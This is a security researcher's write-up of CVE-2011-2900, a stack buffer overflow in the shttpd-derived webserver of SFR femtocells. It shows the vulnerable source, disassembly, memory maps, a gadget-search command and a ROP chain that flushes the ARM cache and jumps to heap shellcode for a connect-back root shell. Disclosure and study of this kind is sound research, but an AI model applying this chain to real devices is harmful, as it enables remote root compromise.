As a part of our
research on the SFR femtocell I had the pleasure to look for a vulnerability
that might assist us in compromising remote devices.
One of the obvious software targets of the box has been the webserver (wsal) that is used to serve some web pages used for configuring the device.
As all other services on the box, it runs with root privileges. The device itself runs a Linux 2.6.18-ubi-sys-V2.0.17 on an ARM926EJ (ARMv5).
The bug (CVE-2011-2900):
I started reversing the binary when at some point Kevin pointed out a string in the binary that hinted towards the Open Source project
shttpd (which has been relabeled in
mongoose at some point and that is also the basis for the
yassl embedded webserver.
So this made things a lot easier. As the web service is fairly powerful (including CGI, SSI support) I first looked for non-software related bugs.
From shttpd.c/defs.h:
struct vec {
const char *ptr;
int len;
};
const struct vec known_http_methods[] = {
{"GET", 3},
{"POST", 4},
{"PUT", 3},
{"DELETE", 6},
{"HEAD", 4},
{NULL, 0}
};
Hmm, that's already more methods than expected. So it made sense to look at those methods.
As the webserver can execute CGI I assumed PUT might be interesting in order to push stuff onto the device and execute it.
However, it turned out that the web directory is mounted read-only (and the code gracefully handles path traversal attempts).
DELETE died for the same reason and it seemed unlikely that this would result in code execution anyway.
Back to software vulnerabilities and the PUT functionality.
Let's have a look at the function handling PUT requests (io_dir.c/put_dir()):
int put_dir(const char *path) {
char buf[FILENAME_MAX];
const char *s, *p;
struct stat st;
size_t len;
for (s = p = path + 2; (p = strchr(s, '/')) != NULL; s = ++p) {
len = p - path;
assert(len < sizeof(buf));
(void) memcpy(buf, path, len);
buf[len] = '\0';
if (my_stat(buf, &st) == -1 && my_mkdir(buf, 0755) != 0)
return (-1);
if (p[1] == '\0') return (0);
}
return (1);
}
The function is pretty simple. It loops over the URL path and tries to create each directory of the complete path (Similar to mkdir -p).
To do that, the path chunk is copied into the stack buffer
buf before it is passed to stat and mkdir.
The
len argument of the memcpy operation is determined by the distance between two consecutive / characters.
Assuming that path can be longer than FILENAME_MAX (+/- a few bytes overhead for the rest of the URL), this is a classical stack-based buffer overflow and
seemed like a nice candidate for code execution.
In this code snippet the len argument is guarded to not overflow (assert statement). However, assert is only in place if the binary was not compiled with -DNDEBUG, right?
I haven't seen any calls to assert wrapper function while looking at the disassembly of wsal.
But let's check this...
The following output is generated using the
radare.
If you're on linux, you need a multi-arch reversing tool chain (with unix philosophy in mind) and you can't or don't want to use IDA, I can highly recommend looking at this tool (even though it's still work-in-progress).
[0x0000b454]> pD 100@sym.put_dir
0x0007d898 sym.put_dir:
0x0007d898 0 f0412de9 push {r4, r5, r6, r7, r8, lr}
0x0007d89c 0 41dd4de2 sub sp, sp, #4160 ; 0x1040
0x0007d8a0 0 18d04de2 sub sp, sp, #24 ; 0x18
0x0007d8a4 0 18708de2 add r7, sp, #24 ; 0x18
0x0007d8a8 0 9c809fe5 ldr r8, [pc, #156] ; 0x0007d94c; => 0xffffefa8
0x0007d8ac 0 0060a0e1 mov r6, r0
0x0007d8b0 0 187047e2 sub r7, r7, #24 ; 0x18
0x0007d8b4 0 023080e2 add r3, r0, #2 ; 0x2
0x0007d8b8 0 2f10a0e3 mov r1, #47 ; 0x2f
0x0007d8bc 0 0300a0e1 mov r0, r3
0x0007d8c0 0> fd34feeb bl imp.strchr
; imp.strchr() [1]
0x0007d8c4 0 005050e2 subs r5, r0, #0 ; 0x0
0x0007d8c8 0 054066e0 rsb r4, r6, r5
0x0007d8cc 0 0610a0e1 mov r1, r6
0x0007d8d0 0 0420a0e1 mov r2, r4
0x0007d8d4 0 0d00a0e1 mov r0, sp
0x0007d8d8 0 1400000a beq 0x0007d930 [2]
0x0007d8dc 0> 3e35feeb bl imp.memcpy
As we can see, we see nothing. In particular, no comparison and no call to __assert_fail.
So we're lucky, looks like we found our candidate for code execution. A pretty simple standard buffer overflow.
Interestingly, the shttpd Makefile even mentions -NDEBUG in order to save ~5kB binary size (remember, this is an embedded device).
Let's look at how put_dir returns so we can get control over the program flow.
At the function entry registers r4-r7 and the link-register are pushed onto the stack.
Leaving looks similar with the difference that the link-register isn't used, but the return value is directly popped into pc.
[0x0000b454]> pD 12@sym.put_dir+140
0x0007d924 0 58d08de2 add sp, sp, #88 ; 0x58
0x0007d928 0 01da8de2 add sp, sp, #4096 ; 0x1000
0x0007d92c 0 f081bde8 pop {r4, r5, r6, r7, r8, pc}
The pc register is equivalent to EIP on x86 with the difference that you can directly read and write to it.
As it is popped from our overflown stack-buffer, this would give us direct control over the program flow.
Now the interesting question was, does wsal also support this request type or is it not calling this function?
[0x0000b454]> pw 48@sym.known_http_methods
0x0008ea90 0x0008e704 0x00000003 0x0008e708 0x00000004 ................
0x0008ead0 0x0008e710 0x00000003 0x0008266c 0x00000006 ........l&......
0x0008eb10 0x0008e714 0x00000004 0x00000000 0x00000000 ................
[0x0000b454]> # here we can already see that this is the vec struct
[0x0000b454]> # lets look for PUT
[0x0000b454]> ps @0x0008e710
PUT
This made it clear that the wsal binary also supports PUT.
Looking at shttpd.c, it seems that PUT as well as DELETE should only be enabled for authorized users (which probably wouldn't be a big problem), but funnily the Makefile also states:
# -DNO_AUTH - disable authorization support (-4kb) which was of course also set by wsal
Exploitation:
Exploitation of this seemed rather straight forward given the nature of this bug.
The stack was marked non-executable in the ELF binary, but fortunately the ARMv5 doesn't support the XN bit yet.
However, experimenting with this bug I noticed fairly quickly that
ASLR is enabled on the device and our stack address is randomized.
As a result, I couldn't just place my shellcode into buf and jump right to it.
ROP would've been an option, but as my ARM knowledge was limited before playing with this bug, I didn't like this option (even though as we will see, I need it anyway, but not for the actual payload).
Return-to-libc, by e.g. returning to system(), was no interesting option either, as the there is no network binary such as netcat installed on the box.
So I had to find something else. And as it turned out, the support for
heap randomization as well as library randomization starts pretty late on ARM. As Kees
points out this started in 2.6.37.
This nails down one possible problem. As path was not the original request buffer, but only a copy of it, I started looking for copies of my input or the possibility to put the payload somewhere else (e.g. a POST body, HTTP headers...).
First, I checked where path is coming from (shttpd.c/decide_what_to_do()):
static void decide_what_to_do(struct conn *c){
char path[URI_MAX], buf[1024], *root;
...
url_decode(c->uri, strlen(c->uri), c->uri, strlen(c->uri) + 1);
remove_double_dots(c->uri);
...
if (strlen(c->uri) + strlen(root) >= sizeof(path)) {
send_server_error(c, 400, "URI is too long");
return;
}
(void) my_snprintf(path, sizeof(path), "%s%s", root, c->uri);
...
if (c->ch.range.v_vec.len > 0) {
send_server_error(c, 501, "PUT Range Not Implemented");
} else if ((rc = put_dir(path)) == 0) {
send_server_error(c, 200, "OK");
}
There we go, path originates from c->uri which is an url-decoded form of itself.
One important thing we have to take into account at this point is that the URL can't be of arbitrary length, but is checked against URI_MAX.
We have to overflow a buffer in put_dir() with a length of FILENAME_MAX...
However, we are lucky, URI_MAX is defined as 16384 (config.h) while FILENAME_MAX from put_dir is an alias for MAX_PATH which is defined as 4096.
So where is c->uri coming from? Again we look at shttpd.c, this time the parse_http_request() function:
static void parse_http_request(struct conn <strong>c) {
...
} else if ((c->uri = malloc(uri_len + 1)) == NULL) {
send_server_error(c, 500, "Cannot allocate URI");
} else {
my_strlcpy(c->uri, (char </strong>) start, uri_len + 1);
parse_headers(c->headers, (c->request + req_len) - c->headers, &c->ch);
...
decide_what_to_do(c);
}
As we can see, c->uri is allocated on the heap and as I mentioned, heap randomization was introduced pretty late on ARM/Linux, I assumed I can just jump right into the heap copy of my input.
There is a nice side-effect of using the heap copy of the buffer to place our shellcode.
Because url_decode() is called on the complete uri length, we have no restrictions whatsoever regarding the bytes we can
include in our final shellcode, it can include zeros and the-like in url-encoded form.
Anyway, few minutes later it became clear that I can't just jump right to it
# cat /proc/480/maps
00008000-0009f000 r-xp 00000000 1f:06 6002148 /opt/ubiquisys/primary/bin/wsal
000a6000-000a8000 rw-p 00096000 1f:06 6002148 /opt/ubiquisys/primary/bin/wsal
000a8000-000c9000 rwxp 000a8000 00:00 0 [heap]
...
402eb000-402f6000 r-xp 00000000 1f:05 2926580 /lib/libgcc_s.so.1
402f6000-402fd000 ---p 0000b000 1f:05 2926580 /lib/libgcc_s.so.1
402fd000-402fe000 rw-p 0000a000 1f:05 2926580 /lib/libgcc_s.so.1
402fe000-4040c000 r-xp 00000000 1f:05 1481528 /lib/libc-2.3.6.so
4040c000-40414000 ---p 0010e000 1f:05 1481528 /lib/libc-2.3.6.so
40414000-40416000 r--p 0010e000 1f:05 1481528 /lib/libc-2.3.6.so
40416000-40417000 rw-p 00110000 1f:05 1481528 /lib/libc-2.3.6.so
...
While the leading zero itself was no a problem for the input itself (because I can just urlencode this), put_dir has a problem with that.
If we recall, the loop is using
strchr to determine len.
So if we include a zero before the terminating / in the URL to jump to our heap buffer, our buffer overflow will actually never happen.
However, the path copy that is passed to put_dir() is created using snprintf() and this is little-endian.
Therefore, we can include
one zero in the url-decoded, stack-based path buffer (in decide_what_to_do()) and pop the address including the zero from there.
It just has to be past the / character that we need to get a large len value.
How do we pop it from there after our buffer was overwritten and the stack frame of put_dir() was teared down?
Here is where some ROP is needed (or call it jump-oriented).
When the put_dir() function is left, the stack pointer is below the path stack buffer that was passed as an address to the put_dir() function (from where it was copied into the stack buffer over put_dir) and is as well already url-decoded.
So if we can lift our stack pointer back up, it should be possible to pop an address with a leading zero from this buffer.
Looking at the mentioned program map output, it is visible that libc and libgcc are mapped at addresses without a leading zero. Their base is also not randomized.
I didn't have any particular tool to find ROP snippets, but as on ARM all instructions are word aligned, it was easy to find proper instructions with objectdump
and grep. In particular
objdump -d /lib/libc-2.3.6.so | grep -A 2 -E 'add sp, sp,.*' | grep -B 2 -E 'pop.*(pc|lr)' (can also be done with radare if you're more advanced in usin it than i am
).
This way I searched for stack lifting instructions followed by an instruction that pops stack buffer content to pc or the link register in order to regain control.
I found a good candidate:
[0x00013994]> pD 8@sym.sigprocmask+108
0x00028ea0 0 84d08de2 add sp, sp, #132 ; 0x84
0x00028ea4 0 f080bde8 pop {r4, r5, r6, r7, pc}
This was perfect. Now I could just make my first jump to this snippet, lift the stack pointer back into my buffer, place the address of sigprocmask+108 url-encoded
in my buffer (together with fake r4-r7 values) and lift the stack until I'm past the / character and pop my zero-address from there.
The goal was still to jump to the shellcode in the heap copy of the buffer.
The ARM-stacle:
This would work well, if the target architecture wouldn't be ARM.
There is an important constraint on ARM when writing exploits. Unlike x86, ARM is based on the
Harvard Architecture.
This means that code and data cache are separated. I didn't know this first.
A result of this was that when hitting my heap shellcode, the program crashed with a SIGILL.
However, analyzing the coredump and the pc at that time always showed correct instructions.
Due to the Harvard Architecture, my shellcode is copied into the data cache.
But in order to execute it, it needs to land in the data cache and then written back to main memory.
Because it wasn't the, the coredump displayed instructions that weren't actually in the data cache and thus resulting in SIGILL, due to whatever was executed as instructions at this point.
It turns out that there are two solutions two this problem. The first one is a simple instruction (MCR). However, it is limited to kernel mode.
The other option is a clear cache syscall that takes 3 arguments, a start address, a range and flags. This seemed nice.
What was even more nice is that the wsal links against libgcc which provides a wrapper to do that:
[0x000023e0]> pD 32@sym.__clear_cache
0x00004484 sym.__clear_cache:
0x00004484 0 04702de5 push {r7} ; (str r7, [sp, #-4]!)
0x00004488 0 0020a0e3 mov r2, #0 ; 0x0
0x0000448c 0 08709fe5 ldr r7, [pc, #8] ; 0x0000449c; => 0x000f0002
0x00004490 0 02009fef svc 0x009f0002
; syscall[0x27e][0]=?
0x00004494 0 8000bde8 pop {r7}
0x00004498 0 1eff2fe1 bx lr
Crafting the 0x009f0002 by ROP would've been a bit painful I suppose so this wrapper was nice.
So before jumping to our shellcode, we need to call this syscall.
A small excerpt from linux-2.6/arch/arm/traps.c to better understand this syscall:
static inline void do_cache_op(unsigned long start, unsigned long end, int flags) {
struct mm_struct *mm = current->active_mm;
struct vm_area_struct *vma;
if (end < start || flags)
return;
down_read(&mm->mmap_sem);
vma = find_vma(mm, start);
if (vma && vma->vm_start < end) {
if (start < vma->vm_start)
start = vma->vm_start;
if (end > vma->vm_end)
end = vma->vm_end;
flush_cache_user_range(vma, start, end);
}
up_read(&mm->mmap_sem);
}
Some places suggest that you can pass 0 as a start and -1 (0xffffffff) as a range to this syscall and flush everything.
However, this doesn't seem to work and looking at this function I also don't understand why it should.
find_vma()(from mmap.c) will traverse the internal tree representation of the kernel until it finds the
first
virtual memory area that satisfies start < vma->vm_start. So if the start address is zero, this should hardly ever end up in the area of attacker controlled payload (unless you are very lucky). Also flushing the complete memory range doesn't work. As we see end will be set to vma->vm_end if it is bigger than the actual vma end.
To sum up, we really need proper values. We need a heap address lower or equal than our shellcode address in r1 and a length larger than our payload in r2.
As __clear_cache() returns using the link register, we furthermore have to fill that with a proper value to regain control after flushing the cache.
So the plan is: overflow the buffer, lift our stack to a place where we can pop arbitrary addresses (these two steps could also be exchanged), flush the cache, jump to shellcode.
The following shows the required ROP sequences to perform this. Searching these instructions was also simply done using objdump and grep:
[0x00013994]> pD 12@sym.makecontext+0x1c
0x00036410 0 04e09de4 pop {lr} ; (ldr lr, [sp], #4)
0x00036414 0 08d08de2 add sp, sp, #8 ; sym.__libc_errno
0x00036418 0 1eff2fe1 bx lr
; ------------
[0x00013994]> # here we pop lr from our input stack buffer, so we can properly return from __clear_cache
[0x00013994]> # we will jump to a random instruction that pops us pc from the stack and in this case r4 even though we don't need it, this way we gain control back after __clear_cache
[0x00013994]> pD 4@sym.free_slotinfo+0x80
0x000f537c 0 1080bde8 pop {r4, pc}
[0x00013994]> # lets fill our range register now
[0x00013994]> pD 4@sym.__aeabi_cfcmple+0x10
0x000f3928 0 0f80bde8 pop {r0, r1, r2, r3, pc}
[0x00013994]> # we don't need r0,r2 and r3, however r1 will pop our range which will be CCCC
[0x00013994]> # at this point we have to get out buffer address into r0
[0x00013994]> # we are lucky and a heap address in front of our payload resists in r11 already (due to previous function calls)
[0x00013994]> # r11 is equivalent to fp
[0x00013994]> # so let's move it..
[0x00013994]> pD 8@sym.envz_merge+0xb8
0x00070bbc 0 0b00a0e1 mov r0, fp
0x00070bc0 0 f08bbde8 pop {r4, r5, r6, r7, r8, r9, fp, pc}
[0x00013994]> # after this step the address of __clear_cache will be popped into pc and the syscall executes flushing our heap range
[0x00013994]> # it returns control to the link register value pointing to the previous snippet popping r4 and pc
[0x00013994]> # which pops our 0 leading heap address into pc and executes the shellcode
Mission accomplished. The used shellcode then executes a connect-back shell!
As a result, this is a remote root for SFR femtocells.
The complete exploit is available
here
It needs slight modification in case you modified your firmware e.g. with library hooking....
As mentioned before, depending on how shttpd/mongoose/yassl embedded webserver have been compiled, they may be affected by the problem itself.
The exact code for them differs slightly, but all of them contain the same bug if compiled with the right options.
Slides of our presentation:
http://femto.sec.t-labs.tu-berlin.de/bh2011.pdf
UPDATE: it seems they have fixed the issue in the latest firmware release (V2.0.24.1) by disabling the PUT functionality completely